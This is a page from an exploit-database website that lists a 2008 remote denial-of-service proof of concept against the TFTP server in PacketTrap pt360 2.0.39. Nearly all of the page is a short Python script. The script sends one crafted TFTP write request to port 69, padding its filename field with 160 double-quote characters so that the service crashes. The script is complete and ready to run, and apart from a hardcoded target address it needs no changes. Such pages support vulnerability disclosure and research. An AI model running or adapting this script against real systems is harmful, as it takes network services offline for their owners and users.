[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit

Author
muts
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6523
Category
dos / poc
Date add
26-03-2008
Platform
unsorted
=========================================================
PacketTrap Networks pt360 2.0.39 TFTPD Remote DoS Exploit
=========================================================





#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS 
# Coded by Mati Aharoni
# muts..at..offensive-security.com


import socket
import sys

host = '172.16.167.134'
port = 69

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "socket() failed"
   sys.exit(1)

filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))



#  0day.today [2024-11-05]  #